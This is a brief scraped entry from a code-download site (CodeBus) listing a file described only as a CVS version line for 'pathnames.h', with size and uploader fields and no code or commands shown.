[Linux-Unixp1-0x

Description: pathnames.h,v 1.1 2004 11 14 07:26:26 paulus Exp.
Platform: | Size: 2048 | Author: sdxunger | Hits:
« 1 23 »

CodeBus www.codebus.net